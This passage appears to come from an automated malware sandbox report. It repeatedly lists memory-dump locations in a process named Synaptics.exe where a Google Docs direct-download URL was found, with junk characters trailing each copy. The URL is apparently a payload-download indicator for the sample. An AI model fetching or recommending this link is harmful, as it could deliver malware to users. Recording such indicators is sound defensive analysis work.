                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIQ
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ:
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIl
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIvS
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJd
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK1
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK:
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK~
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLName
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLYj$y
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLoU-B
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLoU-B3
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM;L
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMS2
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMVQG
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMVe
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMqW&/
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNU
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadName
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOW
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP1
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP:
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP~5$
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQGAH.S
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQP
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQR
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQS
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQs
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQt
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRj
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSUjUj.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSUjUj;
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSZQIXM
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecur
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadServ
                            Source: Synaptics.exe, 00000007.00000002.1750489889.000000000602E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751132872.00000000068AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1755350539.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753799760.000000000827E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752448573.000000000767E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1750594648.000000000616E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1754228757.00000000084FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1740103190.0000000004B1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751212444.00000000069EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753308146.0000000007EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751388458.0000000006C6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1739610883.00000000049BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751302766.0000000006B2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752362906.000000000753E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753494022.000000000813E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751878252.0000000006EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751492697.0000000006DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1739424419.000000000442E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752601685.00000000078FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1750181162.0000000005C6E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUm
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUr_%
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUw_
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVP
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWM
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWZ
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXMVQG
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYWPS
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYq#&0
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_3X
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_aKZ8
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_e
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_ex_d
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadacom%
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaptcl
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadasur
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadavk
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
